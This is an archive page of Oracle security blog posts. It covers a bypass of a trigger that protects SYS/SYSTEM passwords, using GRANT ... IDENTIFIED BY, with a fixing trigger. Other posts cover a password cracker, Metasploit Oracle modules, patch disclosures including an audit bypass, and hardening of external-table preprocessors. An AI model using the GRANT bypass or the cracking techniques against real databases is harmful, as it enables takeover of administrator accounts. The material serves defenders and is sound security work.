Archive of the category Oracle Security

How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it

I found the following nice article "How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password" [271077.1] on My Oracle Support. As always, when I see PL/SQL code I look for ways to find security problems or to bypass its limitations.

SQL> conn  / as sysdba
Connected.

SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
-- fire only for ALTER USER statements that target SYSTEM or SYS
IF ora_sysevent='ALTER' and ora_dict_obj_type = 'USER' and
(ora_dict_obj_name = 'SYSTEM' or ora_dict_obj_name = 'SYS')
THEN
RAISE_APPLICATION_ERROR(-20003,
'You are not allowed to alter SYSTEM/SYS user.');
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL> alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user dbsnmp identified by dbsnmp;
User altered.

Many Oracle users are not aware that the GRANT command can also be used to change passwords or even to create users ("grant dba to user1,user2 identified by user1,user2"). In our case we can use this technique to bypass the database trigger, because the trigger only fires on the ALTER event, not on GRANT.
SQL> grant connect to sys identified by alex;
Grant succeeded.

SQL> grant connect to system identified by alex;
Grant succeeded.

To fix this problem we have to block GRANT commands as well.
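As an added example (my code, not the trigger from the MOS note and not from the post above), here is one way to close the GRANT hole: a single DDL trigger at database level that checks both ALTER USER and GRANT ... IDENTIFIED BY against SYS and SYSTEM. The trigger name, the ON DATABASE scope (the post's trigger was scoped to SCOTT.schema) and the error numbers are my choices; ora_sysevent, ora_dict_obj_type, ora_dict_obj_name and ora_grantee are Oracle's documented system-event attribute functions. Creating a database-level trigger requires the ADMINISTER DATABASE TRIGGER privilege, and the trigger should be verified in the target version with exactly the three statements the post shows.

```sql
-- Added example: block password changes for SYS/SYSTEM via ALTER USER *and*
-- via GRANT ... IDENTIFIED BY. Database-wide scope, not limited to one schema.
CREATE OR REPLACE TRIGGER protect_sys_system_accounts
BEFORE ALTER OR GRANT ON DATABASE
DECLARE
  l_grantees  ora_name_list_t;   -- filled by ora_grantee() on GRANT events
  l_count     BINARY_INTEGER;
BEGIN
  -- Path 1: the classic ALTER USER SYS|SYSTEM ... (what the MOS note covers)
  IF ora_sysevent = 'ALTER'
     AND ora_dict_obj_type = 'USER'
     AND UPPER(ora_dict_obj_name) IN ('SYS', 'SYSTEM')
  THEN
    RAISE_APPLICATION_ERROR(-20003,
      'You are not allowed to alter the SYS/SYSTEM user.');
  END IF;

  -- Path 2: GRANT <role|priv> TO SYS|SYSTEM IDENTIFIED BY ... (the bypass above)
  -- ora_grantee() returns the number of grantees and fills the list.
  IF ora_sysevent = 'GRANT' THEN
    l_count := ora_grantee(l_grantees);
    FOR i IN 1 .. l_count LOOP
      IF UPPER(l_grantees(i)) IN ('SYS', 'SYSTEM') THEN
        RAISE_APPLICATION_ERROR(-20004,
          'Grants to SYS/SYSTEM (including IDENTIFIED BY) are blocked.');
      END IF;
    END LOOP;
  END IF;
END;
/
```

Path 2 deliberately blocks every grant whose grantee is SYS or SYSTEM, not only those carrying an IDENTIFIED BY clause, because the trigger cannot tell the two apart reliably and legitimate grants to these two accounts are rare enough to be done by a DBA who can disable the trigger for the occasion. A BEFORE trigger is used so the statement is rejected before the dictionary is touched; the AFTER trigger in the note also rolls the change back, so either works for the ALTER case.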

New Repscan 3.0 is available

The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large number of new features and a completely new GUI (the first database scanner with an Office-2007-style UI).

Repscan 3.0

Here are some of the new features of Repscan 3.0:

  • Support for MS SQL Server (2000, 2005, 2008)
  • Extremely user-friendly database configuration wizard (screenshot)
  • Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
  • Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
  • New reports (performance, used_features, …)
  • Data Discovery (SSN, PII, Creditcard, Passwords, …)
  • Database Enumeration (custom, NMap support) (screenshot)
  • Pentest Features (Guess SID, Check default username/password combinations, …)
  • Exploit & Code Library (screenshot)
  • Version and Patch Information
  • Skins

Here are some (older) features of Repscan:

  • Password plugin architecture
  • Password plugins for Oracle DES, SHA1, OID, APEX, OVS
  • Commandline features
  • PL/SQL Source Code Analysis Report

Here are some statements from Repscan 3.0 users:

“Repscan Rocks”, “I must have this tool.”, “Very cool stuff”, “really like the clean interface… checks are great”, “…tend to be more Oracle security information hub than just scanner :-)”

Over the next few weeks I will show more details of some Repscan 3.0 features here.

If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo.

Interesting Article about SQL Injection in Oracle by Mike Smithers

Mike Smithers, a former colleague, maintains a nice blog called "The Anti-Kyte". He wrote a really interesting article "Self-Inflicted SQL Injection - don't quote me!" about SQL Injection in Oracle.

Well written Mike.

Dennis Yurichev wrote an article about his FPGA Oracle password cracker

Dennis Yurichev wrote an interesting background article about his FPGA password cracker for Oracle, currently the fastest (known) way to brute force Oracle DES passwords.

Dennis mentioned in the article that "By Oracle's password standard, first password symbol is always Latin character (one of 26)". This is not exactly correct: if you enclose the password in double quotes, all characters are allowed in the first position. I tested the FPGA cracker with the following test case and it does not seem to crack the hash (currently still running).

SQL> grant dba to x identified by "1";

Grant succeeded.

SQL> select username,password from dba_users where username='X';

USERNAME                       PASSWORD
------------------------------ ------------------------------
X                              4D91C057D0C4D801

If you want to try his FPGA cracker here is the link.
Well done and a very interesting article, Dennis. The only thing I would be interested in is the price of the FPGA hardware.

Metasploit 3.3 is out

Metasploit 3.3, the leading exploit framework, is out. Here is an extract from the Metasploit blog:

Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws.

Version 3.3 (release notes) is the largest known Ruby application (375,000 lines of code) and comes with some new Oracle features:

  • Support for the Oracle InstantClient Ruby driver as an exploit mixin
  • Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

Oracle October 2009 CPU Published

Today Oracle released the October 2009 CPU.

In total 38 vulnerabilities were fixed with this CPU (or PSU). This CPU fixes 16 new vulnerabilities in the database; 6 of them are remotely exploitable without authentication and 1 affects client-only installations.
The following components are affected:

  • Advanced Queuing
  • Application Express
  • Authentication
  • CORE RDBMS
  • Data Mining
  • Net Foundation Layer
  • Network Authentication
  • Oracle Spatial
  • Oracle Text
  • PL/SQL
  • RDBMS Data Pump
  • RDBMS Security
  • Workspace Manager

As always, the usual suspects (Alexander, xxx) reported some of the vulnerabilities.

This time Oracle fixed 2 of our vulnerabilities. Only 20 of the Oracle security issues we reported remain unfixed... Oracle is getting better... Time to have a deeper look into 11.2 ;-)

----

Report of Critical Patch Update Fixes for Red Database Security

The following issues reported by you are fixed in the upcoming Critical
Patch Update, due to be released at 1pm, U.S. Pacific Time, on October
20, 2009. We ask that any information that you plan to publish
regarding these issues be released after this date and time.

This Critical Patch Update will contain fixes for the following issues:

Reporter: Alexander Kornbrust

9675691  SQL INJECTION IN UPGRADE SCRIPT CATMETX.SQL

10213261  AUDIT CAN BE BYPASSED USING DBMS_SYS_SQL.PARSE_AS_USER

Please let us know if you have any questions or concerns with this
report. Thank you for reporting these issues to Oracle and for your
patience while we investigated and created the fixes.

----

I will post detailed information including sample code on my blog tomorrow. The dbms_sys_sql bug in particular is critical because it allows bypassing Oracle Auditing completely (and with it products built on Oracle Auditing, such as Oracle Audit Vault). Even though this bug is fixed now, there are other (similar) bugs around which allow bypassing Oracle Auditing completely.

It took only approx. 2 years to fix the dbms_sys_sql problem.

Paul Wright Released Whitepaper About “Create Table to OSDBA” (Preprocessor Exploit)

Paul Wright wrote an interesting whitepaper "Create table to OSDBA" about the new preprocessor feature in 11.1.0.7 and higher, which allows running OS commands via external tables. This whitepaper shows how to escalate privileges by running operating system commands using CREATE TABLE together with utl_file. Oracle plans to backport the functionality to Oracle 10.2.0.5 in the future.

I already talked about the danger of running OS commands via "Create Table" in February 2009 in "Trends 2009" (German slides, slide 20) and released in April 2009 a tutorial on how to run OS commands via Create Table, dbms_scheduler, extproc, PL/SQL native 9, PL/SQL native 10/11, Oracle Text and alter system. Paul added the idea of executing files created with utl_file.

Oracle changed the preprocessor handling in Oracle 11.2.0.1. In 11.2.0.1 it is necessary to have the EXECUTE privilege on a directory object ("Execute a preprocessor program that resides in the directory. A preprocessor program converts data to a supported format when loading data records from an external table with the ORACLE_LOADER access driver. Refer to Oracle Database Utilities for more information. This privilege does not implicitly allow READ access on the external table data.").

Paul wrote a recommendation on how to mitigate the preprocessor risk. He recommends revoking utl_file from PUBLIC. This is a good idea, but keep in mind that there are multiple ways to create (text) files at OS level (e.g. the sample exploit using dbms_advisor).

I would also recommend granting READ and WRITE instead of ALL on directory objects (ALL includes EXECUTE in 11.2.0.1). Granting to PUBLIC is also always a bad idea. Always grant privileges only to a role and/or a specific user.
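To make the two recommendations above concrete, here is an added example (my code, not from Paul's paper and not Oracle's): the weak directory grant next to its hardened form, followed by two dictionary queries a DBA can run to find the exposures discussed in this post. The directory name ext_dir, the role ext_loader_role and the account loader_user are placeholders; DBA_TAB_PRIVS and DBA_DIRECTORIES are the standard dictionary views, and the revoke of utl_file from PUBLIC is Paul's recommendation as quoted above.

```sql
-- Added example. Placeholders: ext_dir, ext_loader_role, loader_user.

-- Weak pattern this post warns about: ALL (which in 11.2.0.1 includes EXECUTE,
-- i.e. the right to run a preprocessor program) granted to everyone.
--   GRANT ALL ON DIRECTORY ext_dir TO PUBLIC;

-- Hardened pattern: only READ/WRITE, only to a dedicated role, and the role
-- only to the account that actually loads external tables.
CREATE ROLE ext_loader_role;
GRANT READ, WRITE ON DIRECTORY ext_dir TO ext_loader_role;
GRANT ext_loader_role TO loader_user;

-- Paul's mitigation: take the file-writing package away from PUBLIC and
-- re-grant EXECUTE individually to the schemas that really need it.
REVOKE EXECUTE ON utl_file FROM PUBLIC;

-- Check 1: every directory privilege that is either EXECUTE (preprocessor
-- capable) or granted to PUBLIC. Directory grants are recorded in
-- DBA_TAB_PRIVS with the directory name in TABLE_NAME and owner SYS.
SELECT p.grantee, d.directory_name, d.directory_path, p.privilege, p.grantable
FROM   dba_tab_privs   p
JOIN   dba_directories d ON d.directory_name = p.table_name
WHERE  p.owner = 'SYS'
AND   (p.privilege = 'EXECUTE' OR p.grantee = 'PUBLIC')
ORDER  BY p.grantee, d.directory_name;

-- Check 2: packages that can write OS files and are still executable by PUBLIC
-- (utl_file is the one Paul names; dbms_advisor is the other route this post
-- mentions). An empty result is the desired state.
SELECT table_name, privilege
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
AND    owner   = 'SYS'
AND    table_name IN ('UTL_FILE', 'DBMS_ADVISOR');
```

Run the two checks before and after the change: the first should no longer list PUBLIC for any directory and should list EXECUTE only for the accounts that legitimately run preprocessors, and the second should come back empty. Revoking utl_file from PUBLIC can break applications that relied on the public grant, so inventory dependent schemas first and grant EXECUTE to them directly.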

Oracle Openworld 2009 - SQL Injection Presentation

Just back from a short trip to Oracle OpenWorld, where I gave the presentation "SQL Injection Crash Course for Developers". This was the first time I talked at OpenWorld in San Francisco. The feedback from the attendees was quite good.

In the SQL Injection presentation I showed some screenshots of the brand new web application scanner Netsparker (previously known as Dilemma) from Mavituna Security.

Netsparker is one of the most advanced web application scanners. Really professional GUI, easy to use. Well done, Ferruh.
Netsparker GUI

Supports the execution of SQL statements and OS commands on the DB server.

Netsparker Command Window

I also met the APEX team from Oracle and had a long, interesting chat with them. Joel Kallmann gave me a few tips on how to harden my APEX 3.2.1 installation using mod_plsql.

What else happened in the Oracle security scene?

Slavik posted today an interesting blog entry about SQL Injection too.

Today Pete Finnigan published an entry about spoofing users and programs in Oracle. In his blog entry he also mentions the bug DB18 from January 2006, found by Imperva. AFAIK I was the first to come up with the idea of patching the oraclient9.dll using a hex editor, and I then sent an email with a description to Pete.

Nowadays this trick is no longer necessary for exploiting this particular issue, since David Litchfield released a small tool (part of OAK - Oracle Assessment Kit) called ora-auth-alter-session.exe. But for many other applications the client-patching technique can still be really useful.

IOUG 2009 Database Security Study - 50% increase in data breaches

Today the IOUG released a database security study. This study, sponsored by Oracle, revealed some interesting facts.

  • 50% increase in data breaches since last year
  • Internal threats (e.g. unauthorized users) are a bigger problem than external hackers
  • Database administration outsourcing increased by 40%
  • Nearly 50% of the organizations use production data in non-production environments

You can download the study from the Oracle site.

Database security is becoming more and more important. People should think about using Oracle security tools (e.g. our database security scanner Repscan, or innovative security monitoring solutions such as Hedgehog) or about joining our 5-day Oracle Anti-Hacker-Training. If you are interested in an (in-house) security training, just send us an email.


Oracle 11.2.0.1.0 is available for download

I just saw on OTN that Oracle 11.2.0.1.0 is out.

New possibility for new security bugs ;-)